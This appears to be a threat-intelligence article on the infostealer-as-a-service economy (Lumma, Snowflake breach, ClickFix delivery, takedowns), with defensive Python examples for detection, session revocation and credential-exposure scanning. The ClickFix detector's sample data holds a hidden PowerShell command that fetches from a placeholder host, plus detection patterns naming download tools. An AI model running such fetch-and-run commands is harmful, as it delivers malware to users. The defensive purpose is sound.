In the first half of 2025, infostealer malware harvested roughly 1.8 billion credentials from 5.8 million infected devices — an 800% jump over the previous six months, according to Flashpoint’s Global Threat Intelligence Index. Stolen logins now figure in 86% of breaches, and Recorded Future’s 2025 Identity Threat Landscape Report indexed 1.95 billion malware-derived credential exposures for the year, with 90% more volume in the final quarter than the first. Credential theft is no longer one technique among many. It is the supply chain.
What changed isn’t the malware itself — browser-grabbers have existed for over a decade. What changed is the business around it. Infostealer-as-a-Service turned a niche tool into a subscription product, with affiliate programs, panels, support channels, and resale markets that look more like SaaS than malware. Understanding how that economy works explains why the same names — Lumma, RedLine, Vidar, StealC — keep showing up at the front of major intrusions.
What an Infostealer Actually Steals
An infostealer is malware purpose-built to extract authentication material and sell it. On execution, a modern stealer typically completes its work in seconds: it decrypts browser-stored passwords and autofill data, lifts active session cookies, exports cryptocurrency wallet files and seed phrases, harvests SSH keys and .config directories, scrapes saved tokens from Discord, Telegram, FTP clients, and email apps, and grabs files matching keyword patterns from the desktop and Documents folders. Then it exfiltrates the bundle — a “log” — to operator infrastructure and exits, often without persisting.
Session cookies are the most consequential prize. When a user authenticates with multi-factor authentication, the service issues a session token that bypasses re-authentication on subsequent requests. A stolen cookie is a logged-in account, regardless of whether MFA is enrolled — which is why Recorded Future advises treating any infostealer exposure as a potential authentication bypass, not a password-reset trigger.
SpyCloud’s 2025 Identity Exposure Report found an average of 44 exposed credentials and 1,861 cookies per infected device. A single contractor’s compromised laptop is rarely a single-account problem.
How the Service Model Works
The shift from custom malware to managed service mirrors what ransomware went through five years ago. Lumma Stealer (also tracked as LummaC2), the most prevalent infostealer of 2024–2025 per the Microsoft Digital Defense Report 2025, is sold in tiered subscriptions: roughly $250/month for the standard build, $1,000 for premium features and custom builds, and $20,000 for source code and reseller rights. Its developer, operating under the handle “Shamel,” reportedly maintained around 400 active clients before the 2025 disruption.
In October 2025, Trend Micro documented a structural evolution: infostealer operators are now adopting affiliate models that mirror ransomware-as-a-service. Operators like the CLR Team and Roku Team recruit affiliates through Telegram bots and web panels, splitting revenue 70–80% to the affiliate and providing crypters, malware builds, hosting, and support. Initial access brokers (IABs), log parsers, and escrow services have emerged as distinct nodes in the value chain. The market continued expanding even after law enforcement took down the Cracked and Nulled marketplaces in March 2025.
Why It’s the Backbone of Intrusions
The clearest demonstration of the model is the 2024 Snowflake campaign. Mandiant identified hundreds of customer Snowflake credentials exposed via infostealers since 2020, and the threat actor it tracks as UNC5537 used those credentials — harvested by Lumma, Vidar, RedLine, Raccoon, RisePro, and MetaStealer over a multi-year window — to access roughly 165 customer tenants, including AT&T, Ticketmaster/Live Nation, and Santander. Around 80% of the compromised accounts belonging to Snowflake customers had prior credential exposure, the credentials had not been rotated, and the affected accounts lacked MFA. The earliest infostealer infection tied to a credential used in the campaign dated to November 2020.
Several of the initial infections, Mandiant noted, occurred on contractor laptops used for both work and personal activities — gaming, pirated software downloads — exactly the consumer-grade vector the IaaS model is built to exploit. The credentials sat in log markets for years before being weaponized. Snowflake didn’t get hacked. Its customers’ password reuse did.
That pattern repeats across the ransomware pipeline. Industry reporting estimates more than half of 2024–2025 ransomware victims had domain credentials surface on infostealer log marketplaces before the attack. The window from log appearance to ransomware deployment has compressed to under 48 hours in observed cases. Initial access brokers buy logs in bulk, validate them, and resell verified corporate access to ransomware affiliates. The infostealer is the front door; the ransomware crew rents the key.
Delivery: ClickFix, Malvertising, and EtherHiding
Distribution has shifted to social engineering that bypasses email filters entirely. The dominant 2024–2025 vector is ClickFix — a fake CAPTCHA, “fix-it” prompt, or browser error that instructs the victim to paste a command into Run, Terminal, or PowerShell. The user executes the malware themselves, side-stepping browser download warnings and most attachment scanning. Microsoft has documented Lumma campaigns combining ClickFix with EtherHiding, which stages payload fragments in smart contracts on Binance Smart Chain, making IP and domain blocking ineffective against the staging layer.
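The ClickFix pattern above has a recognisable process-tree signature: a script host launched from a user-facing parent (Explorer, which also fronts the Run dialog, or a browser) with a command line that hides its window, bypasses execution policy, or fetches something over the network. The scorer below is an added example, not code from the article or from any vendor; the event records and field names are constructed for illustration and do not follow a specific telemetry schema.

```python
# Added example (not from the article): score process-creation events for the
# ClickFix pattern. Field names and sample events are constructed assumptions.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Parents that indicate a human typed or pasted the command.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Script hosts ClickFix lures typically tell the victim to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Command-line traits that matter when combined with the parent/child pairing.
SUSPICIOUS = [
    re.compile(r"(?i)-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass"),
    re.compile(r"(?i)\b(?:iwr|invoke-webrequest|curl|wget|downloadstring)\b"),
    re.compile(r"(?i)https?://"),
]


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Each matched trait adds one point."""
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    child = ev.image.lower().rsplit("\\", 1)[-1]
    reasons = []
    if parent in USER_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{child} spawned by {parent}")
    for pat in SUSPICIOUS:
        if pat.search(ev.command_line):
            reasons.append(f"cmdline matches {pat.pattern}")
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=2):
    """Flag events with at least `threshold` traits; one alone is too noisy,
    because administrators also open PowerShell from Explorer."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.host, ev.command_line, reasons))
    return hits


# Constructed sample telemetry: one lure-like launch, two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("ws-042", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://placeholder.invalid/x"'),
    ProcEvent("ws-017", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ProcEvent("srv-01", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for host, cmd, why in find_clickfix_candidates(SAMPLE_EVENTS):
        print(host, "|", cmd, "|", "; ".join(why))
```

The threshold is the design point: the parent/child pairing alone is common in legitimate administration, so the rule fires only when it coincides with hidden-window, policy-bypass, or download traits, which is the combination a pasted lure command almost always carries.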
Other documented vectors in 2025 include malvertising via Google Ads (Microsoft’s September 2025 Crystal PDF campaign), spear-phishing impersonating Booking.com, fake CrowdStrike installer updates, and SEO-poisoned downloads. macOS users are now in scope: since late 2025, Microsoft Defender Experts has observed macOS-targeted infostealer campaigns delivered through social engineering, including ClickFix-style prompts and malicious DMG downloads, with DigitStealer, MacSync Stealer, and AMOS running fileless pipelines through curl, osascript, and AppleScript automation.
Takedowns Hurt, But Don’t Stop, the Model
In May 2025, Microsoft’s Digital Crimes Unit, the U.S. Department of Justice, the FBI, Europol, and Japan’s Cybercrime Control Center executed a coordinated disruption of Lumma. As part of the disruption announced on May 21, Microsoft’s DCU facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that formed the backbone of the Lumma Stealer infrastructure. The DOJ seized five C2 user-panel domains; the operators stood up three replacements within 24 hours, which were then also seized.
The operation worked, briefly. Trend Micro’s telemetry showed Lumma C2 activity dipping in late May, then climbing back to baseline through June and July as operators rotated to Russia-based hosting providers like Selectel and decentralized their infrastructure further. Affiliate-driven architectures are by design hard to decapitate — every paying customer is an independent operator. The economic conclusion from Trend Micro’s 2025 analysis is blunt: as authentication hardens and password resale margins narrow, the ecosystem is professionalizing around session theft, broader identity abuse, and AI-assisted log enrichment. The model adapts faster than enforcement.
What Defenders Should Actually Do
The defensive implications follow from how the kill chain works, not from any single malware family. Three things matter most.
Treat any infostealer hit as full identity compromise. A stealer log doesn’t just contain passwords; it contains live session cookies. Password resets without session invalidation leave the attacker authenticated. Force re-authentication across SSO, IdP sessions, VPN, and SaaS for any affected user.
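The gap described above (a password reset that leaves stolen sessions alive) is easiest to see in a server-side check. The store below is an added example, not code from the article: each user carries an auth_not_before timestamp, any session token issued before it is rejected, and reset_password deliberately does not move that timestamp, so only force_reauth kills a stolen cookie. The token format, class and method names are assumptions for illustration.

```python
# Added example (not from the article): session validation with a per-user
# "not before" watermark. Token format and names are illustrative assumptions.
import hashlib
import hmac
import secrets

# Per-deployment signing key; generated here only so the example runs stand-alone.
SECRET = secrets.token_bytes(32)


class SessionStore:
    def __init__(self):
        self.auth_not_before: dict[str, int] = {}   # user -> earliest valid issue time
        self.password_generation: dict[str, int] = {}

    def _sign(self, user: str, issued_at: int) -> str:
        payload = f"{user}|{issued_at}".encode()
        return hmac.new(SECRET, payload, hashlib.sha256).hexdigest()

    def issue_session(self, user: str, issued_at: int) -> str:
        """Mint a signed token carrying the issue time (what a cookie would hold)."""
        issued_at = int(issued_at)
        return f"{user}|{issued_at}|{self._sign(user, issued_at)}"

    def reset_password(self, user: str) -> None:
        """Rotates the credential only. Existing sessions stay valid: this is the gap."""
        self.password_generation[user] = self.password_generation.get(user, 0) + 1

    def force_reauth(self, user: str, at: int) -> None:
        """Invalidate every session issued before `at` (e.g. the exposure alert time)."""
        self.auth_not_before[user] = int(at)

    def is_session_valid(self, token: str, now: int, max_age: int = 14 * 86400) -> bool:
        try:
            user, issued_str, mac = token.rsplit("|", 2)
            issued = int(issued_str)
        except ValueError:
            return False
        if not hmac.compare_digest(mac, self._sign(user, issued)):
            return False                      # tampered or foreign token
        if now - issued > max_age:
            return False                      # ordinary expiry
        return issued >= self.auth_not_before.get(user, 0)


if __name__ == "__main__":
    store = SessionStore()
    cookie = store.issue_session("alice", 100)
    store.reset_password("alice")
    print("valid after password reset:", store.is_session_valid(cookie, 200))
    store.force_reauth("alice", 150)
    print("valid after forced re-auth:", store.is_session_valid(cookie, 200))
```

In a real IdP or SaaS backend the watermark lives next to the user record and every relying party must consult it; a reset that only touches the password table leaves the attacker's cookie working exactly as the article warns.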
Close the SSO and “ghost login” gaps. The Snowflake breach worked partly because local username/password logins continued to exist alongside SSO, and MFA enforcement applied only at the IdP, not at the application. Audit for direct local logins on every SaaS tenant, enforce MFA at the application layer, and disable legacy authentication paths.
Monitor for credential exposure continuously, not quarterly. Recorded Future identified 90% more credentials in Q4 2025 than Q1. Subscribe to commercial or open-source breach-data feeds, alert on company-domain hits in stealer logs, and rotate any credential that surfaces — including those that “shouldn’t matter” because they belong to demo or test accounts.
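Alerting on company-domain hits in a stealer-log feed comes down to normalising each record and matching both the service host and the account identity against your own domains. The scanner below is an added example, not code from the article or from any feed vendor; the record layout (url|username|password per line), the company domain, and every sample value are constructed for illustration, and demo or test accounts are intentionally not filtered out.

```python
# Added example (not from the article): match stealer-log records against company
# domains and build a rotation list. Record format and values are constructed.
from urllib.parse import urlsplit

COMPANY_DOMAINS = {"example-corp.com"}   # assumption: your own registrable domains


def _registrable(host: str) -> str:
    """Crude registrable-domain extraction (last two labels). Use a public-suffix
    list in production; this keeps the example dependency-free."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def parse_record(line: str):
    """Parse one 'url|username|password' line; the password is never retained."""
    try:
        url, user, pwd = line.rstrip("\n").split("|", 2)
    except ValueError:
        return None
    host = urlsplit(url if "://" in url else "https://" + url).hostname or ""
    return {"host": host.lower(), "user": user.strip(), "has_password": bool(pwd)}


def exposure_hits(lines, company_domains=COMPANY_DOMAINS):
    """Return de-duplicated (host, user) pairs that touch a company domain, either
    because the service is ours or because the account identity is ours."""
    hits, seen = [], set()
    for line in lines:
        rec = parse_record(line)
        if not rec:
            continue
        host_dom = _registrable(rec["host"])
        user_dom = _registrable(rec["user"].split("@", 1)[1]) if "@" in rec["user"] else ""
        reasons = []
        if host_dom in company_domains:
            reasons.append("company service")
        if user_dom in company_domains:
            reasons.append("company identity")
        if not reasons:
            continue
        key = (rec["host"], rec["user"].lower())
        if key in seen:
            continue
        seen.add(key)
        hits.append({"host": rec["host"], "user": rec["user"], "reasons": reasons})
    return hits


# Constructed sample feed: a VPN login on our domain, a demo account on a third-party
# SaaS tenant using a company identity, an unrelated personal login, a duplicate,
# and a malformed line.
SAMPLE_LOG = [
    "https://vpn.example-corp.com/login|jdoe|placeholder-secret",
    "https://saas-tenant.invalid/|demo.user@example-corp.com|placeholder-secret",
    "https://shop.example.net/account|jdoe@gmail.com|placeholder-secret",
    "https://vpn.example-corp.com/login|jdoe|placeholder-secret",
    "garbage line",
]

if __name__ == "__main__":
    for hit in exposure_hits(SAMPLE_LOG):
        print(f"ROTATE {hit['user']} on {hit['host']}: {', '.join(hit['reasons'])}")
```

The second sample record is the Snowflake shape the article describes: a company identity sitting in a third-party tenant, where an inbound match on the service host alone would miss it, which is why the scanner checks both directions.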
Adopt phishing-resistant authentication. FIDO2 passkeys neutralize credential and cookie theft as an authentication bypass for the accounts they cover. Coverage is uneven across enterprise apps, but for crown-jewel systems — IdP, code repositories, cloud consoles, RMM tools — passkey enrollment is the single highest-leverage control available.
FAQ
Does MFA stop infostealers? Not the way most organizations deploy it. Stealers exfiltrate session cookies that represent already-authenticated sessions, so the attacker logs in as the post-MFA user. MFA at the IdP doesn’t help if a local SaaS login bypasses it. Phishing-resistant MFA (FIDO2/passkeys) plus session-bound tokens are what actually stop the bypass.
How is an infostealer log different from a regular data breach dump? A breach dump typically contains hashed passwords from one service. A stealer log is a full identity package from one infected device: dozens of plaintext credentials across services, plus active session cookies, autofill data, system info, crypto wallets, and sometimes file contents. One log can compromise an entire person’s digital footprint.
Is this still mostly a Windows problem? Less so. Microsoft Defender Experts documented active macOS infostealer campaigns — DigitStealer, MacSync, Atomic macOS Stealer — through late 2025 and into 2026, using fileless pipelines that bypass Gatekeeper. Python-based cross-platform stealers like PXA Stealer add Linux exposure. Treat macOS endpoints as in-scope.
What does a stolen log actually cost? Tier and freshness drive price. Bulk consumer logs sell for cents per record on Telegram markets; verified logs containing corporate VPN, RMM, or cloud-console access can fetch hundreds to thousands per access, with initial access brokers operating as middlemen between stealer operators and ransomware affiliates.
The Through-Line
Every dollar a ransomware operator earns starts somewhere upstream. Increasingly, that starting point is a $200-a-month subscription to a stealer panel and a teenage affiliate pasting a ClickFix command onto a Reddit thread. The reason credential theft has become the backbone of modern intrusions isn’t a technical breakthrough — it’s that the criminal economy figured out specialization. Stop treating infostealer hits as endpoint hygiene incidents. They’re access-broker source material, and the clock on weaponization is measured in hours.